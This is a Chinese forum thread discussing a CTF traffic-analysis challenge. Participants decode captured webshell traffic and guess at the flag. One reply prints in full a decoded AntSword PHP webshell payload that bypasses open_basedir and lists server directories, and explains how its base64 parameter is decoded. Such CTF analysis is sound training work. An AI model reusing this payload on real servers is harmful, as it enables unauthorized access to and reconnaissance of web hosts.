一个ctf流量分析题
本帖最后由 GoogleHacking 于 2024-1-5 19:40 编辑题目链接:https://wwxp.lanzouw.com/iZpFV1k4vr7g
这个流量分析题最后追到的流量是这样,但是导出对象没有找到php和txt,全是加密的,求一个解题思路,这个加密流量看着像一句话木马,套了base64,但是不知道怎么解,最终的flag是啥,求大佬指导
GoogleHacking 发表于 2024-1-5 19:51
https://qsnctf.com/challenges#%E ... 88%86%E6%9E%902-558
攻击流量分析2
qsnctf{The_ant_sword_is_really_easy_to_use} GoogleHacking 发表于 2024-1-5 23:27
你这个图里面,流为啥是4,这个流是干嘛用的。我看最多只能到5,这个流作用是啥?怎么根据流量的特征来判 ...
流是为了方便看http包,无法根据流量特征来直接找到数字大小,具体看题型如果是这种马的流量;那么进去先筛选http的包,然后一个个看流(主要看数据包内容),根据内容来进行判断是否流量包含文件、压缩包、还是像本题一样考察的是蚁剑的流量加密编码等 URL编解码一下。
qsnctf=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.7b1e4cec";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "8518"."6016";echo @asenc($output);echo "fc"."118";}ob_start();try{$D=base64_decode(substr($_POST["u0bbb0e2037d9d"],2));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R=" ".$T." ".@filesize($P)." ".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();& 蚁剑的马 ,注意后面的u0bbb0e2037d9d=WoL3Zhci93d3cvaHRtbC9xc25jdGYudHh0,删掉Wo,把这个拿去base64,d3cvaHRtbC9xc25jdGYudHh0 > /var/www/html/qsnctf.txt /var/www/html/qsnctf.txt 内容 8c9f7dc394a11abeb069d 一脚本而已,第3个TCP流 zeror 发表于 2024-1-5 19:06
一脚本而已,第3个TCP流
所以最终的flag是啥 yimingqpa 发表于 2024-1-5 17:36
URL编解码一下。
qsnctf=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_b ...
这个我解过了,但是没啥用,找不到flag aake 发表于 2024-1-5 18:17
/var/www/html/qsnctf.txt 内容 8c9f7dc394a11abeb069d
所以最终的flag是啥 GoogleHacking 发表于 2024-1-5 19:42
所以最终的flag是啥
拼接下,看flag提交规则,flag{8c9f7dc394a11abeb069d} 或qcnctf{8c9f7dc394a11abeb069d} aake 发表于 2024-1-5 19:44
拼接下,看flag提交规则,flag{8c9f7dc394a11abeb069d} 或qcnctf{8c9f7dc394a11abeb069d}
试了这个qcnctf{8c9f7dc394a11abeb069d},不对